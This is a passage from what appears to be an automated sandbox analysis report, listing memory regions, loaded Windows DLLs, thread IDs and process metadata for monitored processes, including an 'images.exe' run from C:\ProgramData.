"private_0x0000000000190000" filename = "" Region: id = 1598 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 1599 start_va = 0x1b0000 end_va = 0x1bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 1600 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1601 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1602 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1603 start_va = 0x4c0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 1604 start_va = 0x500000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 1605 start_va = 0x560000 end_va = 0x56ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 1606 start_va = 0x570000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 1607 start_va = 0x5b0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1608 start_va = 0x6b0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006b0000" filename = "" Region: id = 1609 start_va = 0x6f0000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1610 start_va = 0x730000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1611 start_va = 0x770000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000770000" filename = "" Region: id = 1612 start_va = 0x7b0000 end_va = 0x937fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007b0000" filename = "" Region: id = 1613 start_va = 0x940000 end_va = 0xac0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000940000" filename = "" Region: id = 1614 start_va = 0xaf0000 end_va = 0xafffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000af0000" filename = "" Region: id = 1615 start_va = 0xb80000 end_va = 0xbbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b80000" filename = "" Region: id = 1616 start_va = 0xbc0000 end_va = 0xbfffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000bc0000" filename = "" Region: id = 1617 start_va = 0xdf0000 end_va = 0xdf5fff monitored = 0 entry_point = 0xdf1890 region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\SysWOW64\\dllhost.exe" (normalized: "c:\\windows\\syswow64\\dllhost.exe") Region: id = 1618 start_va = 0xe00000 end_va = 0x4dfffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000e00000" filename = "" Region: id = 1619 start_va = 0x4e00000 end_va = 0x61fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004e00000" filename = "" Region: id = 1620 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1621 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1622 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1623 start_va = 0x71d30000 end_va = 0x71da4fff monitored = 0 entry_point = 0x71d69a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1624 start_va = 0x73d70000 end_va = 0x73f8bfff monitored = 0 entry_point = 0x73f3bc40 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\SysWOW64\\actxprxy.dll" (normalized: "c:\\windows\\syswow64\\actxprxy.dll") Region: id = 1625 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1626 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1627 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1628 start_va = 0x74630000 end_va = 0x7463efff monitored = 0 entry_point = 0x74632e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1629 start_va = 0x74640000 end_va = 0x74683fff monitored = 0 entry_point = 0x74647410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1630 start_va = 0x74820000 end_va = 0x74856fff monitored = 0 entry_point = 0x74823b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1631 start_va = 0x74860000 end_va = 0x748a4fff monitored = 0 entry_point = 0x7487de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1632 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1633 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1634 start_va = 0x74d70000 end_va = 0x75268fff monitored = 0 entry_point = 0x74f77610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1635 start_va = 0x75310000 end_va = 0x75393fff monitored = 0 entry_point = 0x75336220 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\SysWOW64\\clbcatq.dll" (normalized: "c:\\windows\\syswow64\\clbcatq.dll") Region: id = 1636 start_va = 0x753a0000 end_va = 0x7544cfff monitored = 0 entry_point = 0x753b4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1637 start_va = 0x75510000 end_va = 0x7551bfff monitored = 0 entry_point = 0x75513930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1638 start_va = 0x75580000 end_va = 0x755d7fff monitored = 0 entry_point = 0x755c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1639 start_va = 0x75680000 end_va = 0x756c3fff monitored = 0 entry_point = 0x75699d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1640 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1641 start_va = 0x75830000 end_va = 0x758aafff monitored = 0 entry_point = 0x7584e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1642 start_va = 0x75910000 end_va = 0x7599cfff monitored = 0 entry_point = 0x75959b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1643 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1644 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1645 start_va = 0x75c70000 end_va = 0x7706efff monitored = 0 entry_point = 0x75e2b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1646 start_va = 0x77480000 end_va = 0x7763cfff monitored = 0 entry_point = 0x77562a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1647 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1648 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1649 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1650 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1651 start_va = 0x7fff0000 end_va = 0x7df85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1652 start_va = 0x7df85d0d0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df85d0d0000" filename = "" Region: id = 1653 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1654 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 1655 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 1656 start_va = 0x77660000 end_va = 0x7774afff monitored = 0 entry_point = 0x7769d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1657 start_va = 0xc00000 end_va = 0xc90fff monitored = 0 entry_point = 0xc38cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1658 start_va = 0x6200000 end_va = 0x6536fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1659 start_va = 0x755e0000 end_va = 0x75671fff monitored = 0 entry_point = 0x75618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1660 start_va = 0x72420000 end_va = 0x7256afff monitored = 0 entry_point = 0x72481660 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 1661 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1662 start_va = 0xb00000 end_va = 0xb44fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1663 start_va = 0xad0000 end_va = 0xad3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1664 start_va = 0xc00000 end_va = 0xc8dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Thread: id = 47 os_tid = 0xf90 Thread: id = 48 os_tid = 0xf8c Thread: id = 49 os_tid = 0xf80 Thread: id = 50 os_tid = 0xf7c Thread: id = 51 os_tid = 0xf78 Thread: id = 52 os_tid = 0xf68 Thread: id = 53 os_tid = 0xf60 Thread: id = 54 os_tid = 0xf58 Process: id = "14" image_name = "images.exe" filename = "c:\\programdata\\images.exe" page_root = "0xb96e000" os_pid = "0xfa0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "11" os_parent_pid = "0xf2c" cmd_line = "\"C:\\ProgramData\\images.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1684 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1685 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1686 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1687 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1688 start_va = 0xa0000 end_va = 0x19ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1689 start_va = 0x1a0000 end_va = 0x1a3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 1690 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 1691 start_va = 0x1c0000 end_va = 0x1c1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1692 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1693 start_va = 0x400000 end_va = 0x555fff monitored = 1 entry_point = 0x553b50 region_type = mapped_file name = "images.exe" filename = "\\ProgramData\\images.exe" (normalized: "c:\\programdata\\images.exe") Region: id = 1694 start_va = 0x77760000 end_va = 0x778dafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 1695 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1696 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1697 start_va = 0x7fff0000 end_va = 0x7ff85d0cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 1698 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1699 start_va = 0x7ff85d291000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ff85d291000" filename = "" Region: id = 1706 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 1707 start_va = 0x68240000 end_va = 0x6828ffff monitored = 0 entry_point = 0x68258180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 1708 start_va = 0x682a0000 end_va = 0x68319fff monitored = 0 entry_point = 0x682b3290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 1709 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1710 start_va = 0x68290000 end_va = 0x68297fff monitored = 0 entry_point = 0x682917c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 1711 start_va = 0x730000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1712 start_va = 0x74c90000 end_va = 0x74d6ffff monitored = 0 entry_point = 0x74ca3980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 1713 start_va = 0x75ac0000 end_va = 0x75c3dfff monitored = 0 entry_point = 0x75b71b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 1717 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1718 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 1719 start_va = 0x560000 end_va = 0x61dfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1720 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1721 start_va = 0x75830000 end_va = 0x758aafff monitored = 0 entry_point = 0x7584e970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 1722 start_va = 0x74570000 end_va = 0x7462dfff monitored = 0 entry_point = 0x745a5630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 1723 start_va = 0x620000 end_va = 0x65ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 1724 start_va = 0x730000 end_va = 0x82ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000730000" filename = "" Region: id = 1725 start_va = 0x8a0000 end_va = 0x99ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008a0000" filename = "" Region: id = 1726 start_va = 0x75680000 end_va = 0x756c3fff monitored = 0 entry_point = 0x75699d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 1727 start_va = 0x753a0000 end_va = 0x7544cfff monitored = 0 entry_point = 0x753b4f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 1728 start_va = 0x74490000 end_va = 0x744adfff monitored = 0 entry_point = 0x7449b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 1729 start_va = 0x74480000 end_va = 0x74489fff monitored = 0 entry_point = 0x74482a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 1730 start_va = 0x75580000 end_va = 0x755d7fff monitored = 0 entry_point = 0x755c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 1731 start_va = 0x749b0000 end_va = 0x74afefff monitored = 0 entry_point = 0x74a66820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 1732 start_va = 0x756d0000 end_va = 0x75816fff monitored = 0 entry_point = 0x756e1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 1733 start_va = 0x77660000 end_va = 0x7774afff monitored = 0 entry_point = 0x7769d650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 1734 start_va = 0x77480000 end_va = 0x7763cfff monitored = 0 entry_point = 0x77562a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 1735 start_va = 0x755e0000 end_va = 0x75671fff monitored = 0 entry_point = 0x75618cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 1736 start_va = 0x75c70000 end_va = 0x7706efff monitored = 0 entry_point = 0x75e2b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 1737 start_va = 0x74820000 end_va = 0x74856fff monitored = 0 entry_point = 0x74823b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 1739 start_va = 0x74d70000 end_va = 0x75268fff monitored = 0 entry_point = 0x74f77610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 1740 start_va = 0x74860000 end_va = 0x748a4fff monitored = 0 entry_point = 0x7487de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 1741 start_va = 0x75510000 end_va = 0x7551bfff monitored = 0 entry_point = 0x75513930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 1742 start_va = 0x75910000 end_va = 0x7599cfff monitored = 0 entry_point = 0x75959b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 1743 start_va = 0x74640000 end_va = 0x74683fff monitored = 0 entry_point = 0x74647410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 1744 start_va = 0x74630000 end_va = 0x7463efff monitored = 0 entry_point = 0x74632e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 1745 start_va = 0x9a0000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009a0000" filename = "" Region: id = 1746 start_va = 0x1d0000 end_va = 0x1f9fff monitored = 0 entry_point = 0x1d5680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1747 start_va = 0x9a0000 end_va = 0xb27fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000009a0000" filename = "" Region: id = 1748 start_va = 0xb30000 end_va = 0xb3ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000b30000" filename = "" Region: id = 1749 start_va = 0x75c40000 end_va = 0x75c6afff monitored = 0 entry_point = 0x75c45680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 1750 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 1751 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1752 start_va = 0xb40000 end_va = 0xcc0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b40000" filename = "" Region: id = 1753 start_va = 0xcd0000 end_va = 0x20cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000cd0000" filename = "" Region: id = 1754 start_va = 0x71d30000 end_va = 0x71da4fff monitored = 0 entry_point = 0x71d69a60 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\SysWOW64\\uxtheme.dll" (normalized: "c:\\windows\\syswow64\\uxtheme.dll") Region: id = 1755 start_va = 0x20d0000 end_va = 0x21effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000020d0000" filename = "" Region: id = 1756 start_va = 0x21f0000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000021f0000" filename = "" Region: id = 1757 start_va = 0x2bf0000 end_va = 0x2d43fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 1758 start_va = 0x74130000 end_va = 0x7414afff monitored = 0 entry_point = 0x74139050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 1759 start_va = 0x71e40000 end_va = 0x71fbdfff monitored = 0 entry_point = 0x71ebc630 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\SysWOW64\\urlmon.dll" (normalized: "c:\\windows\\syswow64\\urlmon.dll") Region: id = 1760 start_va = 0x71ff0000 end_va = 0x722bafff monitored = 0 entry_point = 0x7222c4c0 region_type = mapped_file name = "iertutil.dll" filename = 